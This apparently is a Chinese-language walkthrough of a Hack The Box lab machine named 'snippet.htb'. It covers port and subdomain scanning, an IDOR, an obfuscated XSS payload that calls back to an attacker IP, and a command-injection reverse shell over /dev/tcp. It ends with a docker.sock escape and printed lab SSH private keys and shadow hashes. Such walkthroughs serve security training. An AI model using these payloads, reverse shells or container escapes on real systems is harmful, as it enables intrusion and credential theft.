基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ nmap -sC -sV -Pn 10.10.11.171
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-04 14:17 CST
Nmap scan report for 10.10.11.171
Host is up (0.36s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8221e2a5824ddf3f99db3ed9b3265286 (RSA)
|   256 913ab2922b637d91f1582b1b54f9703c (ECDSA)
|_  256 6520392ba73b33e5ed49a9acea01bd37 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: snippet.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 119.77 seconds

80

snippet.htb,需要账号密码登录

子域名扫描

添加hosts后扫描子域名,得到dev和mail:

1
2
3
4
5
6
10.10.11.171 snippet.htb

ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u "http://snippet.htb/" -H 'Host: FUZZ.snippet.htb' -fl 30

dev                     [Status: 200, Size: 12822, Words: 1029, Lines: 250, Duration: 328ms]
mail                    [Status: 200, Size: 5311, Words: 364, Lines: 97, Duration: 354ms]

dev

一个gitea,注册账号登录后得到已有的几个有效用户名:

mail

Roundcube Webmail:

API fuzz

主站源码中提取出路由信息:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
curl -s 10.10.11.171 | grep Ziggy | sed 's/    const Ziggy = //' | jq | grep uri | awk '{print $2}' | tr -d '"",'

_ignition/health-check
_ignition/execute-solution
_ignition/share-report
_ignition/scripts/{script}
_ignition/styles/{style}
dashboard
users
snippets
snippets/{id}
snippets/update/{id}
snippets/update/{id}
snippets/delete/{id}
new
management/validate
management/dump
register
login
forgot-password
forgot-password
reset-password/{token}
reset-password
verify-email
verify-email/{id}/{hash}
email/verification-notification
confirm-password
logout

management/dump

fuzz参数,fuzz值,得到users信息,profile是空的:

破解出几个有效账号密码:

1
2
3
4
5
gia@snippet.htb
juliana@snippet.htb
letha@snippet.htb
fredrick@snippet.htb
ef92b778bafe771e89245b89ecbc08a44a4e166c06659911881f383d4473e94f:password123

snippet

任意一个有效账号密码登录,查看snippets,只有一个可以查看的,修改id发现存在API,现在无权限查看:

自己创建一个snippet,更新信息时只保留public为true(重要,别把内容也给改了,那就只能reset了),修改id为2,可以越权修改其他snippet的设置,从而查看id为2的snippet:

1
2
3
curl -XGET http://dev.snippet.htb/api/v1/users/jean/tokens -H 'accept: application/json' -H 'authorization: basic amVhbjpFSG1mYXIxWTdwcEE5TzVUQUlYblluSnBB'

jean:EHmfar1Y7ppA9O5TAIXnYnJpA

Gitea

jean是gitea那里的有效用户,可以登录dev的gitea,查看代码发现对issue的XSS过滤:

str.replace 仅替换第一次出现的 <> 标签,因此我们可以使用两个 <> 标签来绕过它

查看设置可以发现charlie是合作者,所以可以通过issue xss去打charlie:

xss

所以就是通过XSS把我们当前的jean用户加入到charlie的合作者中, 在charlie的repo中得到backup:

1
test<test><img SRC="x" onerror=eval.call`${"eval\x28atob`dmFyIHU9J2h0dHA6Ly9kZXYuc25pcHBldC5odGIvY2hhcmxpZS9iYWNrdXBzL3NldHRpbmdzL2NvbGxhYm9yYXRpb24nO2ZldGNoKHUpLnRoZW4ociA9PiBkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCdtZXRhW25hbWU9Il9jc3JmIl0nKS5jb250ZW50KS50aGVuKHQgPT4gZmV0Y2godSx7bWV0aG9kOidQT1NUJyxoZWFkZXJzOiB7J0NvbnRlbnQtVHlwZSc6J2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZDsnfSwgYm9keTonY29sbGFib3JhdG9yPWplYW4mX2NzcmY9Jyt0fSkudGhlbihkID0+IGZldGNoKCdodHRwOi8vMTAuMTAuMTQuMTAvP2RvbmUnKSkp`\x29"}`>

user flag

backup中得到charlie的ssh 私钥,登录,然后切换到jean用户,密码就是前面得到的,得到user flag:

charlie_id_rsa

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAx3BQ74w6hDrMrj5bxneqSvicR8WjTBF/BEIWdzJpvWi+9onO
ufOUl0P+DE9YEv51HpOLqZ/ZuSUxzMV/Wf2Po4+aglepfGBx6GfuEm2mVH9x3T8p
OZGWvs7qMMsh86ViyLwivMm0s/NdW8I0NnKVmN9DVksJL5VO++Pc4GCkBHqQEU1p
V5FeCUX/ah8cllmGC/W4op0aVM9MTlzD5YB1IOTpZgo8dG1yvVpySHWqBuG/Hg4L
A2/lLn0OBU1nj52v4dpwuJ+7RgicgGgrJfj6roHEDsdQFs5uv0v7roYboKnknLo6
Fiz2/eQtTVb176+AhSdgs3UPqj9A7QgxV0GY6wIDAQABAoIBAQCh1N6n8rbM81WB
EjKwUgvJ+AAAMTw3jn7tup62LB8nReam8N3hf+iT8eUkogGKsBXjMMCEbKRkGu1V
BvE22YyDoRQ0LePme/ASMLs7EuSD7kI70HOoNh4HSKk53Kr5JLuKvTbG0DmkR5b6
zRRHFiWTvZ7LV+nlRZeox5ZEL8cHpejKB5wBdVJ/UvHRs/XvvZv86JFagbbfzrH6
DJz4isE9SEFxcnWtKAnCz03CoP8mI0+5klIP359hkOKx1dYfSlc4zccZqU5y1Uiv
tEtcEnvaPoARSuxA3hoN6wchnOvLbzFO2RN5vtxZ9YmztcelMOHLUrliun96sUgV
33XkTjPpAoGBAPIo0UfIT4XXscKNkSp1VXai9E3noH1E2q6fIccAvmpOA3I2AW7R
eEe1OD3beuArgL+RVF8oJOAD+UkWn8CP2bXnnT11a753WGUnPIr5Q9Mm1rZcrCD2
EF5689eKSq49ecu2ISt3lyb4VMku1GXzQ3zaFELI8eSvTNXQjpLeAWBFAoGBANLW
bQjQz81+dwud4grHGUCe2L9g0k/KmnJ//Q0+6iI9EGNmJLf5yHnYnqvIWWXSpOss
Q3ZTJGWUHJ/vDlrSpauZ6FJM9X4YLJ2DsSPFcxfcps+Y1oGE8o9Q7XHqyE4UrDiM
H36CsRGPNwmwNMNHUb/lkjELYKzSF58cTdA7Rp9vAoGBAOJL+qcWLhppoxioqwv+
cktXpO5YksX93k5pL2uE6mz1UoscpOImpjx8wX4s6PssLDjZWvtBzJP7oq4Gkmul
AlLXiz2vyWxIozaEIDPPFO7x0JzCpah3ynxAcjbuaTPDB1qzbPPt4jbswm7vcFWF
q3+1XFG87zBCEY+OQm5FQQvxAoGAfJZ3Mflqgm0T3cp7U5EZjAUR4e1N+haoM7cM
CvK9mmPpNkOauRiibdYi1TH8Gd5i1BGA///bhycBz0SNf//wJDo7fb66ZrvUSXQT
jibUfypFbHFNeJXeW/Afj+yEVxeCOZwb1D9YcR7nEBOO6kJPvYzkWZT2mMlBaiVo
mf8dGYMCgYEA2Bqocj0mcncnt2m1F6Obp3ptv7zwF/upk70lC6z3uo1xTSfnGPP/
MaX9vAmUF9XNwolFVzU6STMreBPRshW9RK+3tcx8Elxj4y+tMQCLHLvgyyYaGbp8
iPU8FQCtjFpHKqxW0xdDDvfHUeUmiQRTZ1o3kJK6mr3QM89LJC/l7gA=
-----END RSA PRIVATE KEY-----

提权信息

运行pspy,得到mysql密码:

查看用户目录中的代码,发现可能存在命令注入:

因为是docker的mysql,靶机上没有mysql客户端,所以转发端口后查看信息:

1
2
3
4
ssh -i charlie_id_rsa charlie@10.10.11.171 -L 13306:127.0.0.1:3306

use webapp;
update users set user_type='Manager' where email='gia@snippet.htb';

命令注入

把我们已有的gia用户修改为管理员,网页上查看member查处的validate功能就是前面存在命令注入的功能点:

那直接创建一个恶意用户,利用命令注入得到容器 shell:

1
insert into users(name,email) values('shell','shell@shell|| bash -c "bash -i >& /dev/tcp/10.10.14.10/4444 0>&1" &');

docker 逃逸 & root flag

/app目录中存在docker.sock文件,常规docker逃逸:

1
2
3
4
5
6
7
curl -s --unix-socket /app/docker.sock http://localhost/images/json
# output
laravel-app_main:latest

cmd="[\"/bin/sh\",\"-c\",\"chroot /tmp sh -c \\\"bash -c 'bash -i &>/dev/tcp/10.10.14.10/4444 0<&1'\\\"\"]"
curl -s -X POST --unix-socket /app/docker.sock -d "{\"Image\":\"laravel-app_main\",\"cmd\":$cmd,\"Binds\":[\"/:/tmp:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create?name=miao_root
curl -s -X POST --unix-socket /app/docker.sock "http://localhost/containers/miao_root/start"

得到root shell:

shadow

1
2
3
root:$6$XJ0deONw$c1ag/76NHYRVSxMwMeoYPUDsxZDdjC6sX5KKa.QUHi2mjIwN1NlLyRt3QS3E6JjPknuSSOyIUcTTq2SbIXZle/:19157:0:99999:7:::
jean:$6$2ct8z568$.FX4a9sSYGk0QxQiqfiMFIRu.oGdRvGcFgtOz3Hu9bV2i6/Z.IpWlZxZn5iySUJuq9Rqw6oS8yTSFxbAZ4ede.:19156:0:99999:7:::
charlie:$6$Ai.uOoSz$8QB.fXSM7pS2DDpUNBR3Xr3v3MUqlWdSmwEtOjOaRpH73UxGrcxJ/hPkM7h.MfFHM2gzoyHL0.c7s/glcc0Fu.:18995:0:99999:7:::

root_id_rsa

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAxhCO2ZdFzdJj6zdL/L38ZGE7OzyRCnJ4qZJyz50X7Ux9JHWT
7kZWP3uElhlwF2WbqsPoS/iUtAjV9keflS/38zfZEp1n/o7g+q8Fw+oxF0s/6fud
hA4KieW/bKnG+aeaC/lBgx5L5EGqsw+RKeBqFmCVi8ySy1SEH4vy7mZzWO4w6Egy
ywWyk1gxGBEUuq1xVT0Wvagw+AQtkTJ9jo7wEGA1kAsY0G02hbwelLSPppTx72Ei
Pyr2hb9m5pwK6ywz38+4h4dPkyijcbaR0LNNKzDaeBGD78RxbnszHUTXKO/EsQYD
qEYqbFkSMgoMylW8wbxtS1I7T+TW4+tvQzgw9QIDAQABAoIBAQCH384PqX4Cj6Vq
NHoVfcQKnMVEgu1BTHxIYCYRFUTXztQ+0cZU/L2oOTUgv3ytIFBlGpZen75rr3AQ
ztvEPa8MlDB/W6p+8EeY0b7TwvJAd6f1/V32vKcwKINkqSfOFtNQCYOOzpbjlMTk
p/Y+0ywUA9gzmnjNskIdXiWetHvG8hNBArCU2h9CdlAr2thi3j1j3DR7VBUvuwtw
6ny1422XL8xyIMg1qjLh9kFy6Ndif+GmnzuoQW4a18lDflIZQC+03MPRaZUuUbVE
pTIDztWjs1+YeVoGPq4nzy+1RsyrxCdA+0+0j6ZK6/++vJPsm+V1/xaModV+XRyg
TjsQ0MJBAoGBAOnZ7qtDS/3qSXV6e+kzYcJUTF1d18gXaKfrEm3y09eKJ9mnApTf
fW99PlP+wK+eLUbsdxz9xiBxGGuxB+XYclDLIkoIn2308ruBptYMz7LYkcaypsCB
XEdi5bY8PlkXICXVhLaFNACydFf0Ve8cj4XG2t1WcBhKbVgCvIKbrzhxAoGBANjS
7TmGIIdZarvx4icPboemviW6wbXYY79jGFA+zvQ6DFt3cNoLYKpFfzZoaOXrJyix
ocFijM0Jc+BX0c13bhCgnjxnZ2/IV3ggeEjKVeuV5wx1+TzdjpR0EAbvWUjd2Q41
xSL6kSRI+Po/6Tn9GuzWidMrygWMNT1JhEVVbuLFAoGALDI1+0QyvoBi9cL6XC6L
0VBhRlwQBg72hpXU29bC1r+TnH0F7eD3MfT3rKQ/AnHgmMDkGiSUJ1l4hhHlLjlk
EYTyrA9JIlzi6zEruNSfBGwN0QG+pi9Mo2k7hN+J4QiP2NaryFsQYvlXJ7BT9Wbu
cRgOETre4JhgZfvOaNjHmuECgYBnW70cA9Uz0CsyJq8g4ZlV7uWLxMgcsGd0T3/C
mP48rANCAuD4AB53bKOkwwbmOz+yhWLPdfQatZvYYOSxZnJAWOC1eLF1NvKDYC8W
u+VTZWT7qq1CF3elSuJs++H6+05CGN29u+Y+fs65NIgwTXhtWCPhV2l5VYn3ijkU
eBJg5QKBgQChntZ26dV5zBuH+sUBFDD38ATjMKWwKBy4EhogrPP1WPODi7MfPlSW
9Pp/C6+rAd91VPcGo6TJD15CDhzTfzffHnjZJ0Nb6HDRL7mw6oimwVTLJttUk8GV
QGGCfL85CcYSjPpqQp8ZOml4k/SaSzDUhb06PCuFi+i4afyuQyHAzw==
-----END RSA PRIVATE KEY-----

参考资料